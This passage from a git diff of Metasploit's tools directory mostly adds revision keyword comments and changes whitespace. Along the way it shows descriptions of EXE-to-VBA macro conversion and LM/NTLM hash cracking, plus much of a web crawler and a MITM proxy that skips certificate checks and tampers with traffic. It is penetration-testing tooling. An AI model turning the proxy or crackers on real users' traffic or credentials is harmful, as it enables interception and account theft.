b/tools/exe2vba.rb index 58107f8867..dbc4db4a1a 100755 --- a/tools/exe2vba.rb +++ b/tools/exe2vba.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script converts an EXE to a VBA script for Word/Excel # Credit to PriestMaster for the original C code # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/exe2vbs.rb b/tools/exe2vbs.rb index db14a6eeaa..04db88a5cb 100755 --- a/tools/exe2vbs.rb +++ b/tools/exe2vbs.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script converts an EXE to a vbs script # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/find_badchars.rb b/tools/find_badchars.rb index 102e195fa5..3823f03cb7 100755 --- a/tools/find_badchars.rb +++ b/tools/find_badchars.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script is intended to assist an exploit developer in deducing what # "bad characters" exist for a given input path to a program. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) diff --git a/tools/halflm_second.rb b/tools/halflm_second.rb index c09f90b6fd..b78e563adc 100755 --- a/tools/halflm_second.rb +++ b/tools/halflm_second.rb @@ -1,10 +1,14 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script cracks a half-lm challenge/response hash that uses a # a static challenge key. The idea is you use rainbow tables to # crack the first 7 chars and this script to complete a few remaining. # If the password is longer than 10 characters, this script will fail. # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/import_webscarab.rb b/tools/import_webscarab.rb index 84ce918aef..b063c2e239 100755 --- a/tools/import_webscarab.rb +++ b/tools/import_webscarab.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# # Script which allows to import OWASP WebScarab sessions # (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) @@ -11,7 +15,7 @@ require 'sqlite3' puts "--- WMAP WebScarab Session Importer ---------------------------------------------" puts -if ARGV.length < 2 +if ARGV.length < 2 $stderr.puts("Usage: #{File.basename($0)} wescarabdirectory sqlite3database [target] [startrequest]") $stderr.puts $stderr.puts("webscarabdirectory\tThe directory where you stored the webscarab session") @@ -60,7 +64,7 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| # regulare expressions to extract the stuff that we really need # i know that the url stuff can be handeled in one request but # i am toooo lazy... - regex_conversation = /^### Conversation : (\d+)/ + regex_conversation = /^### Conversation : (\d+)/ regex_datetime = /^WHEN: (\d+)/ regex_method = /^METHOD: (\S+)/ regex_status = /^STATUS: (\d\d\d)/ @@ -70,47 +74,47 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| if line =~ regex_conversation then conversation_id = regex_conversation.match(line)[1] next if conversation_id.to_i < start_id - + # we don't care about scripts, commets - while (line =~ regex_datetime) == nil + while (line =~ regex_datetime) == nil line = log.gets end - + # Add a dot to the timestring so we can convert it more easily date_time = regex_datetime.match(line)[1] date_time = Time.at(date_time.insert(-4, '.').to_f) - + method = regex_method.match(log.gets)[1] - + # we don't care about COOKIES while (line =~ regex_status) == nil line = log.gets end status = regex_status.match(line)[1] - + url_matcher = regex_url.match(log.gets) - + puts "Processing (#{conversation_id}): #{url_matcher[0]}" - + ssl = url_matcher[1] == "https" host_name = url_matcher[2] port = url_matcher[3] path = url_matcher[4].chomp - query = url_matcher[5] - + query = url_matcher[5] + if host_name.match("#{target}$").nil? == true then puts("Not the selected target, skipping...") next end - + if(target_ips.has_key?(host_name)) then host = target_ips[host_name] else ip = Resolv.getaddress(host_name) target_ips[host_name] = ip host = ip - end - + end + # set the parameters in the insert query insert_statement.bind_param("host", host) insert_statement.bind_param("port", port) @@ -121,12 +125,12 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| insert_statement.bind_param("respcode", status) insert_statement.bind_param("created", date_time) insert_statement.bind_param("respcode", status) - + #Open the files with the requests and the responses... request_filename = "#{ws_directory+File::SEPARATOR}conversations#{File::SEPARATOR+conversation_id}-request" puts("Reading #{request_filename}") - request_file = File.open(request_filename, "rb") - + request_file = File.open(request_filename, "rb") + # Analyse the request request_header = "" request_file.gets # we don't need the return code... @@ -134,41 +138,41 @@ File.open("#{ws_directory+File::SEPARATOR}conversationlog", "r") do |log| request_header += request_line break if request_line == "\r\n" end - - + + request_body = "" while(request_line = request_file.gets) do request_body += request_line end - + insert_statement.bind_param("headers", request_header) insert_statement.bind_param("body", request_body) - - request_file.close() - + + request_file.close() + response_filename = "#{ws_directory+File::SEPARATOR}conversations#{File::SEPARATOR+conversation_id}-response" puts("Reading #{response_filename}") response_file = File.open("#{ws_directory+File::SEPARATOR}conversations#{File::SEPARATOR+conversation_id}-response", "rb") - + # scip the first line response_file.gets - + # Analyse the response response_header = "" while(response_line = response_file.gets) do response_header += response_line break if response_line == "\r\n" end - + response_body = response_file.read - + insert_statement.bind_param("resphead", response_header) insert_statement.bind_param("response", response_body) - - response_file.close() - + + response_file.close() + insert_statement.execute() - end + end end end diff --git a/tools/lm2ntcrack.rb b/tools/lm2ntcrack.rb index db3002ab65..f80a30539a 100755 --- a/tools/lm2ntcrack.rb +++ b/tools/lm2ntcrack.rb @@ -1,8 +1,12 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script cracks a NTLM hash based on the case-insensitive LANMAN password # Credit to Yannick Hamon for the idea/perl code # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/metasm_shell.rb b/tools/metasm_shell.rb index cb6704eac8..959164e4b5 100755 --- a/tools/metasm_shell.rb +++ b/tools/metasm_shell.rb @@ -1,8 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This tool provides an easy way to see what opcodes are associated with # certain x86 instructions by making use of Metasm! # +# +# $Revision$ +# # This file is part of Metasm, the Ruby assembly manipulation suite # Copyright (C) 2007 Yoann GUILLOT diff --git a/tools/module_author.rb b/tools/module_author.rb index 8075e65e60..f2977838cb 100755 --- a/tools/module_author.rb +++ b/tools/module_author.rb @@ -1,5 +1,8 @@ #!/usr/bin/env ruby # +# $Id$ +# $Revision$ +# # This script lists each module by its licensing terms # @@ -10,7 +13,7 @@ require 'rex' require 'msf/ui' require 'msf/base' -Indent = ' ' +Indent = ' ' # Initialize the simplified framework instance. $framework = Msf::Simple::Framework.create @@ -47,7 +50,7 @@ $framework.nops.each_module { |name, mod| x.author.each do |r| r = r.to_s tbl << [ 'nop/' + name, r ] - names[r]||=0; names[r]+=1 + names[r]||=0; names[r]+=1 end } $framework.encoders.each_module { |name, mod| @@ -55,7 +58,7 @@ $framework.encoders.each_module { |name, mod| x.author.each do |r| r = r.to_s tbl << [ 'encoder/' + name, r ] - names[r]||=0; names[r]+=1 + names[r]||=0; names[r]+=1 end } $framework.auxiliary.each_module { |name, mod| @@ -63,7 +66,7 @@ $framework.auxiliary.each_module { |name, mod| x.author.each do |r| r = r.to_s tbl << [ 'auxiliary/' + name, r ] - names[r]||=0; names[r]+=1 + names[r]||=0; names[r]+=1 end } diff --git a/tools/module_license.rb b/tools/module_license.rb index f9a615b179..0ff8545d2e 100755 --- a/tools/module_license.rb +++ b/tools/module_license.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script lists each module by its licensing terms # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) @@ -11,10 +15,10 @@ require 'msf/ui' require 'msf/base' def lic_short(l) - if (l.class == Array) + if (l.class == Array) l = l[0] end - + case l when MSF_LICENSE 'MSF' @@ -29,7 +33,7 @@ def lic_short(l) end end -Indent = ' ' +Indent = ' ' # Initialize the simplified framework instance. $framework = Msf::Simple::Framework.create diff --git a/tools/module_ports.rb b/tools/module_ports.rb index 2001997016..9e036b0136 100755 --- a/tools/module_ports.rb +++ b/tools/module_ports.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script lists each module by the default ports it uses # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/module_reference.rb b/tools/module_reference.rb index 24ffa5e179..49c4aef16d 100755 --- a/tools/module_reference.rb +++ b/tools/module_reference.rb @@ -1,7 +1,11 @@ #!/usr/bin/env ruby # +# $Id$ +# # This script lists each module by its licensing terms # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/module_targets.rb b/tools/module_targets.rb index 80baffda24..64236c561d 100755 --- a/tools/module_targets.rb +++ b/tools/module_targets.rb @@ -4,6 +4,8 @@ # # This script lists each module by the default ports it uses # +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/msf_irb_shell.rb b/tools/msf_irb_shell.rb index 0381237f7b..188f08951d 100755 --- a/tools/msf_irb_shell.rb +++ b/tools/msf_irb_shell.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) diff --git a/tools/msfcrawler.rb b/tools/msfcrawler.rb index 21883554e6..a647d1c5b0 100755 --- a/tools/msfcrawler.rb +++ b/tools/msfcrawler.rb @@ -1,8 +1,11 @@ #!/usr/bin/env ruby # -# Web Crawler. +# $Id$ +# +# Web Crawler. # # Author: et [at] metasploit.com 2010 +# $Revision$ # # @@ -18,7 +21,7 @@ begin rescue LoadError puts "Error: sqlite3-ruby not found" end - + msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) @@ -34,7 +37,7 @@ $sleeptime = 0 $taketimeout = 15 # Read timeout (-1 forever) -$readtimeout = -1 +$readtimeout = -1 # Directory containing crawler modules $crawlermodulesdir = File.join(File.dirname(msfbase),"..", "data", "msfcrawler") @@ -81,13 +84,13 @@ class HttpCrawler self.ctarget = target self.cport = port self.cssl = ssl - + self.useproxy = useproxy self.proxyhost = proxyhost self.proxyport = proxyport - + self.cinipath = (inipath.nil? or inipath.empty?) ? '/' : inipath - + inireq = { 'rhost' => self.ctarget, 'rport' => self.cport, @@ -98,19 +101,19 @@ class HttpCrawler 'query' => nil, 'data' => nil } - - + + @NotViewedQueue = Rinda::TupleSpace.new @ViewedQueue = Hash.new @UriLimits = Hash.new - + insertnewpath(inireq) - + puts "Loading modules: #{$crawlermodulesdir}" load_modules puts "OK" end - + def reqtemplate(target,port,ssl) hreq = { 'rhost' => target, @@ -120,15 +123,15 @@ class HttpCrawler 'ctype' => nil, 'ssl' => ssl, 'query' => nil, - 'data' => nil + 'data' => nil } return hreq end - + def storedb(hashreq,response,dbpath) #postgres , pg gem - + db = SQLite3::Database.new(dbpath) #db = Mysql.new("127.0.0.1", username, password, databasename) until !db.transaction_active? @@ -136,29 +139,29 @@ class HttpCrawler #wait end #puts "db: #{db.transaction_active?}" - + #CREATE TABLE "wmap_requests" ( - # "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, - # "host" varchar(255), - # "address" varchar(16), - # "address6" varchar(255), - # "port" integer, - # "ssl" integer, - # "meth" varchar(32), - # "path" text, - # "headers" text, - # "query" text, - # "body" text, - # "respcode" varchar(16), - # "resphead" text, - # "response" text, + # "id" INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, + # "host" varchar(255), + # "address" varchar(16), + # "address6" varchar(255), + # "port" integer, + # "ssl" integer, + # "meth" varchar(32), + # "path" text, + # "headers" text, + # "query" text, + # "body" text, + # "respcode" varchar(16), + # "resphead" text, + # "response" text, # "created_at" datetime); - + db.transaction db.execute( "insert into wmap_requests (host,address,address6,port,ssl,meth,path,headers,query,body,respcode,resphead,response,created_at,updated_at) values (?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", hashreq['rhost'], hashreq['rhost'], - hashreq['rhost'], + hashreq['rhost'], hashreq['rport'].to_i, hashreq['ssl']? 1:0, hashreq['method'], @@ -171,51 +174,51 @@ class HttpCrawler SQLite3::Blob.new(response.body.to_s), Time.new, Time.new - ) + ) db.commit - + db.close end - + def run i, a = 0, [] - - - + + + begin reqfilter = reqtemplate(self.ctarget,self.cport,self.cssl) - + loop do - + #### #if i <= $threadnum # a.push(Thread.new { #### - + hashreq = @NotViewedQueue.take(reqfilter, $taketimeout) - - ul = false + + ul = false if @UriLimits.include?(hashreq['uri']) and $enableul - #puts "Request #{@UriLimits[hashreq['uri']]}/#{$maxurilimit} #{hashreq['uri']}" - if @UriLimits[hashreq['uri']] >= $maxurilimit - #puts "URI LIMIT Reached: #{$maxurilimit} for uri #{hashreq['uri']}" - ul = true + #puts "Request #{@UriLimits[hashreq['uri']]}/#{$maxurilimit} #{hashreq['uri']}" + if @UriLimits[hashreq['uri']] >= $maxurilimit + #puts "URI LIMIT Reached: #{$maxurilimit} for uri #{hashreq['uri']}" + ul = true end else - @UriLimits[hashreq['uri']] = 0 + @UriLimits[hashreq['uri']] = 0 end - - if !@ViewedQueue.include?(hashsig(hashreq)) and !ul - + + if !@ViewedQueue.include?(hashsig(hashreq)) and !ul + @ViewedQueue[hashsig(hashreq)] = Time.now @UriLimits[hashreq['uri']] += 1 - + if !File.extname(hashreq['uri']).empty? and $dontcrawl.include? File.extname(hashreq['uri']) if $verbose puts "URI not crawled #{hashreq['uri']}" end - else - + else + prx = nil if self.useproxy prx = "HTTP:"+self.proxyhost.to_s+":"+self.proxyport.to_s @@ -231,33 +234,33 @@ class HttpCrawler ) sendreq(c,hashreq) - - - end + + + end else if $verbose puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}" end end - + #### #}) - #i += 1 + #i += 1 #else # sleep(0.01) and a.delete_if {|x| not x.alive?} while not a.empty? # i = 0 #end #### - - end + + end rescue Rinda::RequestExpiredError puts "END." return end end - + # # Modified version of load_protocols from psnuffle by Max Moser # @@ -266,7 +269,7 @@ class HttpCrawler if (not File.directory?(base)) raise RuntimeError,"The Crawler modules parameter is set to an invalid directory" end - + @crawlermodules = {} cmodules = Dir.new(base).entries.grep(/\.rb$/).sort cmodules.each do |n| @@ -278,7 +281,7 @@ class HttpCrawler cmod = $1 klass = m.const_get("Crawler#{cmod}") @crawlermodules[cmod.downcase] = klass.new(self) - + puts("Loaded crawler module #{cmod} from #{f}...") end rescue ::Exception => e @@ -286,43 +289,43 @@ class HttpCrawler end end end - - def sendreq(nclient,reqopts={}) - + + def sendreq(nclient,reqopts={}) + begin - + r = nclient.request_raw(reqopts) resp = nclient.send_recv(r, $readtimeout) while(resp and resp.code == 100) resp = nclient.reread_response(resp, $readtimeout) - end - + end + if resp # # Quickfix for bug packet.rb to_s line: 190 - # In case modules or crawler calls to_s on de-chunked responses + # In case modules or crawler calls to_s on de-chunked responses # resp.transfer_chunked = false if resp['Set-Cookie'] #puts "Set Cookie: #{resp['Set-Cookie']}" #puts "Storing in cookie jar for host:port #{reqopts['rhost']}:#{reqopts['rport']}" - #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie'] + #$cookiejar["#{reqopts['rhost']}:#{reqopts['rport']}"] = resp['Set-Cookie'] end - + if $dbs storedb(reqopts,resp,$dbpathmsf) end - + puts ">> [#{resp.code}] #{reqopts['uri']}" - + if reqopts['query'] and !reqopts['query'].empty? - puts ">>> [Q] #{reqopts['query']}" + puts ">>> [Q] #{reqopts['query']}" end - if reqopts['data'] - puts ">>> [D] #{reqopts['data']}" + if reqopts['data'] + puts ">>> [D] #{reqopts['data']}" end - + case resp.code when 200 @crawlermodules.each_key do |k| @@ -335,15 +338,15 @@ class HttpCrawler end insertnewpath(urltohash('GET',resp['Location'],reqopts['uri'],nil)) when 404 - puts "[404] Invalid link #{reqopts['uri']}" + puts "[404] Invalid link #{reqopts['uri']}" else puts "Unhandled #{resp.code}" - end - + end + else puts "No response" end - sleep($sleeptime) + sleep($sleeptime) rescue puts "ERROR" if $verbose @@ -360,7 +363,7 @@ class HttpCrawler hashreq['uri'] = canonicalize(hashreq['uri']) if hashreq['rhost'] == self.ctarget and hashreq['rport'] == self.cport - if !@ViewedQueue.include?(hashsig(hashreq)) + if !@ViewedQueue.include?(hashsig(hashreq)) if @NotViewedQueue.read_all(hashreq).size > 0 if $verbose puts "Already in queue to be viewed" @@ -369,9 +372,9 @@ class HttpCrawler if $verbose puts "Inserted: #{hashreq['uri']}" end - + @NotViewedQueue.write(hashreq) - end + end else if $verbose puts "#{hashreq['uri']} already visited at #{@ViewedQueue[hashsig(hashreq)]}" @@ -379,33 +382,33 @@ class HttpCrawler end end end - + # # Build a new hash for a local path # - + def urltohash(m,url,basepath,dat) # m: method # url: uri?[query] # basepath: base path/uri to determine absolute path when relative # data: body data, nil if GET and query = uri.query - + uri = URI.parse(url) uritargetssl = (uri.scheme == "https") ? true : false - + uritargethost = uri.host - if (uri.host.nil? or uri.host.empty?) + if (uri.host.nil? or uri.host.empty?) uritargethost = self.ctarget uritargetssl = self.cssl end - + uritargetport = uri.port - if (uri.port.nil?) + if (uri.port.nil?) uritargetport = self.cport end uritargetpath = uri.path - if (uri.path.nil? or uri.path.empty?) + if (uri.path.nil? or uri.path.empty?) uritargetpath = "/" end @@ -418,9 +421,9 @@ class HttpCrawler if !newp.to_s.empty? newp = File.join(oldp.dirname,newp) end - end - end - + end + end + hashreq = { 'rhost' => uritargethost, 'rport' => uritargetport, @@ -435,14 +438,14 @@ class HttpCrawler if m == 'GET' and !dat.nil? hashreq['query'] = dat else - hashreq['data'] = dat + hashreq['data'] = dat end - - - + + + return hashreq end - + # Taken from http://www.ruby-forum.com/topic/140101 by Rob Biedenharn def canonicalize(uri) u = uri.kind_of?(URI) ? uri : URI.parse(uri.to_s) @@ -458,59 +461,59 @@ class HttpCrawler u.to_s end - - + + def hashsig(hashreq) hashreq.to_s end -end +end class BaseParser attr_accessor :crawler - + def initialize(c) self.crawler = c - end + end def parse(request,result) nil end - + # # Add new path (uri) to test hash queue # def insertnewpath(hashreq) self.crawler.insertnewpath(hashreq) end - + def hashsig(hashreq) self.crawler.hashsig(hashreq) end def urltohash(m,url,basepath,dat) - self.crawler.urltohash(m,url,basepath,dat) + self.crawler.urltohash(m,url,basepath,dat) end - + def targetssl self.crawler.cssl end - + def targetport self.crawler.cport end - + def targethost self.crawler.ctarget end - + def targetinipath self.crawler.cinipath end end -trap("INT") { +trap("INT") { exit() } @@ -523,13 +526,13 @@ $args = Rex::Parser::Arguments.new( "-h" => [ false, "Display this help information"], "-v" => [ false, "Verbose" ] ) - -if ARGV.length < 1 + +if ARGV.length < 1 puts("\n" + " Usage: #{$0} \n" + $args.usage) exit -end - -turl = nil +end + +turl = nil $args.parse(ARGV) { |opt, idx, val| case opt when "-d" @@ -540,30 +543,30 @@ $args.parse(ARGV) { |opt, idx, val| when "-u" $useproxy = true when "-v" - $verbose = true + $verbose = true when "-x" $proxyhost = val when "-p" - $proxyposrt = val + $proxyposrt = val when "-h" puts("\n" + " Usage: #{$0} \n" + $args.usage) exit end -} +} if $crun uri = URI.parse(turl) tssl = (uri.scheme == "https") ? true : false - - if (uri.host.nil? or uri.host.empty?) + + if (uri.host.nil? or uri.host.empty?) puts "Error: target http(s)://target/path" exit end - + if $useproxy - puts "Using proxy: #{$proxyhost}:#{$proxyport}" + puts "Using proxy: #{$proxyhost}:#{$proxyport}" end - + mc = HttpCrawler.new(uri.host,uri.port,uri.path,tssl,$proxyhost, $proxyport, $useproxy) if $dbs puts "Database: #{$dbpathmsf}" @@ -576,10 +579,10 @@ if $crun end puts "Target: #{mc.ctarget} Port: #{mc.cport} Path: #{mc.cinipath} SSL: #{mc.cssl}" - mc.run + mc.run end - - - + + + diff --git a/tools/msfproxy.rb b/tools/msfproxy.rb index 8cae684971..3e1f23b9b0 100755 --- a/tools/msfproxy.rb +++ b/tools/msfproxy.rb @@ -1,8 +1,11 @@ #!/usr/bin/env ruby # -# MITM proxy. +# $Id$ +# +# MITM proxy. # # Author: et [at] metasploit.com 2009 +# $Revision$ # # openssl before rubygems mac os @@ -16,7 +19,7 @@ begin rescue LoadError puts "Error: sqlite3-ruby not found" end - + msfbase = File.symlink?(__FILE__) ? File.readlink(__FILE__) : __FILE__ $:.unshift(File.join(File.dirname(msfbase), '..', 'lib')) @@ -55,7 +58,7 @@ module HttpProxy def initialize @isssl = false @sslconnectdone = false - + if $modulepname m = ::Module.new begin @@ -64,7 +67,7 @@ module HttpProxy mname = $1 klass = m.const_get("Tamper#{mname}") $modclass = klass.new() - + #puts("Loaded proxy module #{mname} from #{$modulepname}...") end rescue ::Exception => e @@ -73,10 +76,10 @@ module HttpProxy end end end - + def post_init if $printcon - client = Socket.unpack_sockaddr_in(get_peername) + client = Socket.unpack_sockaddr_in(get_peername) puts "Received a new connection from #{client.last}:#{client.first}" end # @@ -86,7 +89,7 @@ module HttpProxy start_tls end end - + def get_first_line(data) # # Just the first line @@ -96,64 +99,64 @@ module HttpProxy firstline = line.chomp break end - + return firstline end - - def parse_target_array(target,ssl) + + def parse_target_array(target,ssl) tarr = [] - - # + + # # Clean garbage from target string and return [host,port,pathquery] # puri = target.sub(/^https:\/+|^http:\/+/,"") ppath = puri.scan(/\/.+|\//) tarr = puri.sub(/\/.+|\//,"").split(/:/) - + if !tarr[1] if ssl tarr[1] = 443 else tarr[1] = 80 - end + end end - + if ppath[0] tarr[2] = ppath[0] else tarr[2] = "/" - end + end return tarr end - + def receive_data(data) firstlinearray=[] - + # # Just for transparent mode # - if $tmode + if $tmode @sslconnectdone = true @isssl = true end - + if !@sslconnectdone firstlinestr = get_first_line(data) firstlinearray = firstlinestr.split(" ") else - @isssl = true + @isssl = true end - + if !@isssl @targethost,@targetport,@targetpathquery = parse_target_array(firstlinearray[1], @usessl) - if firstlinearray[0] and firstlinearray[0].include?("CONNECT") + if firstlinearray[0] and firstlinearray[0].include?("CONNECT") send_data "HTTP/1.0 200 Connection established\r\n\r\n" #start_tls(:verify_peer => false) start_tls @sslconnectdone = true else # - # Adjust host:port/pathquery for /pathwuery on nonssl connection + # Adjust host:port/pathquery for /pathwuery on nonssl connection # data["#{firstlinestr}"] = "#{firstlinearray[0]} #{@targetpathquery} #{firstlinearray[2]}" if data.include? firstlinestr handle_connection(data,@isssl) @@ -164,75 +167,75 @@ module HttpProxy # if $tmode dumbstr ="" - @targethost,@targetport,dumbstr = parse_target_array($ttarget, $tssl) + @targethost,@targetport,dumbstr = parse_target_array($ttarget, $tssl) handle_connection(data,$tssl) else handle_connection(data,@isssl) end end - end - + end + def handle_connection(request,usingssl) if $printreq p "REQUEST: #{request}" end - + # Use Rex::Proto::Http::Request to use # evasion techniques and allow to manipulate # request easily. - + modreq = Rex::Proto::Http::Request.new case modreq.parse(request) when Rex::Proto::Http::Packet::ParseCode::Completed - + # REQUEST INJECTION POINT if $modclass modreq = $modclass.tamper_request(modreq,usingssl) end # Done with user mods. - + if modreq.headers['Proxy-Connection'] modreq.headers['Connection'] = 'close' modreq.headers.delete('Proxy-Connection') - end - + end + # Uncomment this line if you want to see clear text i.e. gzip #modreq.headers.delete('Accept-Encoding') - - # Adjust parsed request to httpclient - method = modreq.method - - uri = "http://" + + # Adjust parsed request to httpclient + method = modreq.method + + uri = "http://" if usingssl uri = "https://" end - - uritarget = "" + + uritarget = "" uritarget << "#{@targethost}:#{@targetport}#{modreq.resource}" uri << uritarget - + query = modreq.qstring - body = modreq.body #modreq.data? + body = modreq.body #modreq.data? extheader = modreq.headers - - # + + # # Using httpclient so not to deal with rebuilding a ruby http client - # + # c = HTTPClient.new if usingssl c.ssl_config.verify_mode = OpenSSL::SSL::VERIFY_NONE end - + begin # Send Request resp = c.request(method, uri, query, body, extheader) - + respstr = "HTTP/#{resp.version} " respstr << resp.status.to_s respstr << " " respstr << resp.reason respstr << "\r\n" - + hr = resp.header.all headstr = "" hr.collect { |var, val| @@ -242,11 +245,11 @@ module HttpProxy headstr << "#{var}: #{val.to_s}\r\n" end } - headstr << "\r\n" + headstr << "\r\n" respstr << headstr respstr << resp.content - if $printstatus + if $printstatus puts "[-] #{resp.status.to_s}\t#{@targethost}\t#{modreq.resource}\t#{modreq.method} #{resp.content.length}" end # @@ -258,29 +261,29 @@ module HttpProxy if usingssl sslint = 1 end - + strq = "" modreq.qstring.each_pair do |k,v| if strq.empty? strq = k + "=" + v else - strq = k + "=" + v + "&"+ strq + strq = k + "=" + v + "&"+ strq end end - - + + # Using $db as connection Thread.new{ until !$db.transaction_active? puts "Waiting for db" #wait end - - $db.transaction $db.execute( "insert into wmap_requests values ( ?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", + + $db.transaction $db.execute( "insert into wmap_requests values ( ?,?,?,?,?,?,?,?,?,?,?,?,?,?,?)", nil, @targethost, @targethost, - @targethost, + @targethost, @targetport, sslint, modreq.method, @@ -293,43 +296,43 @@ module HttpProxy SQLite3::Blob.new(resp.content), Time.new ) - + $db.commit - }.join + }.join end - # + # # Response # - + # RESPONSE INJECTION POINT if $modclass respstr = $modclass.tamper_response(respstr,usingssl) end # Done with user mods. - + if $printres p "RESPONSE: #{respstr}" - end - - # Send response to client + end + + # Send response to client send_data respstr - + rescue HTTPClient::ConnectTimeoutError => exc - # Can configure connection timeout via HTTPClient#connect_timeout=. + # Can configure connection timeout via HTTPClient#connect_timeout=. puts "Error: ConnectTimeoutError to #{@targethost}: #{exc.message}" rescue HTTPClient::ReceiveTimeoutError => exc - # Can configure connection timeout via HTTPClient#receive_timeout=. + # Can configure connection timeout via HTTPClient#receive_timeout=. puts "Error: ReceiveTimeoutError to #{@targethost}: #{exc.message}" - end + end when Rex::Proto::Http::Packet::ParseCode::Error p "Parsing Error!!!" - end + end unbind end - + def unbind - self.close_connection_after_writing + self.close_connection_after_writing end end @@ -338,7 +341,7 @@ def usage exit end -trap("INT") { +trap("INT") { exit() } @@ -347,15 +350,15 @@ $args = Rex::Parser::Arguments.new( "-b" => [ false, "Print responses: Default false" ], "-c" => [ false, "Print connection message: Default false"], "-u" => [ false, "Print status: Default false"], - "-v" => [ false, "Print requests and responses: Default false" ], + "-v" => [ false, "Print requests and responses: Default false" ], "-i" => [ true, "Listening IP address. Default 0.0.0.0" ], "-p" => [ true, "Listening proxy port. Default 8080" ], "-d" => [ false, "Store requests to Metasploit database" ], - "-w" => [ true, "Metasploit database path" ], + "-w" => [ true, "Metasploit database path" ], "-t" => [ true, "Transparent mode. http(s)://host:port." ], "-m" => [ true, "Load module. path/module.rb."], "-h" => [ false, "Display this help information" ]) - + $args.parse(ARGV) { |opt, idx, val| case opt when "-a" @@ -365,20 +368,20 @@ $args.parse(ARGV) { |opt, idx, val| when "-c" $printcon = true when "-u" - $printstatus = true + $printstatus = true when "-v" $printreq = true $printres = true - $printcon = true - when "-d" + $printcon = true + when "-d" $storedb = true puts "Storing requests in #{$storedbpath}." $db = SQLite3::Database.new($storedbpath) - when "-w" + when "-w" $storedbpath = val $storedb = true puts "Storing requests in #{$storedbpath}." - $db = SQLite3::Database.new($storedbpath) + $db = SQLite3::Database.new($storedbpath) when "-i" defaultip = val when "-m" @@ -391,15 +394,15 @@ $args.parse(ARGV) { |opt, idx, val| puts "Transparent mode: #{$ttarget}" if $ttarget.include?("https://") $tssl = true - end + end when "-h" usage end -} +} EventMachine::run { puts "SSL Support: #{EM.ssl?}." - + EM.epoll EM::start_server(defaultip, defaultport, HttpProxy) puts "Listening on #{defaultip} port #{defaultport}." diff --git a/tools/nasm_shell.rb b/tools/nasm_shell.rb index 356ea07ae8..262539a8c8 100755 --- a/tools/nasm_shell.rb +++ b/tools/nasm_shell.rb @@ -1,9 +1,13 @@ #!/usr/bin/env ruby # +# $Id$ +# # This tool provides an easy way to see what opcodes are associated with # certain x86 instructions by making use of nasm if it is installed and # reachable through the PATH environment variable. # +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) diff --git a/tools/pattern_create.rb b/tools/pattern_create.rb index 7c0c5de2f1..ea7631919c 100755 --- a/tools/pattern_create.rb +++ b/tools/pattern_create.rb @@ -1,4 +1,8 @@ #!/usr/bin/env ruby +# +# $Id$ +# $Revision$ +# $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib')) @@ -13,4 +17,4 @@ end # sets. sets = ARGV.length > 0 ? ARGV : Rex::Text::DefaultPatternSets -puts Rex::Text.pattern_create(length.to_i, sets) \ No newline at end of file +puts Rex::Text.pattern_create(length.to_i, sets) diff --git a/tools/pattern_offset.rb b/tools/pattern_offset.rb index ac062dc4e5..0ddc0bd6d3 100755 --- a/tools/pattern_offset.rb +++ b/tools/pattern_offset.rb @@ -1,4 +1,6 @@ #!/usr/bin/env ruby +# $Id$ +# $Revision$ $:.unshift(File.join(File.dirname(__FILE__), '..', 'lib'))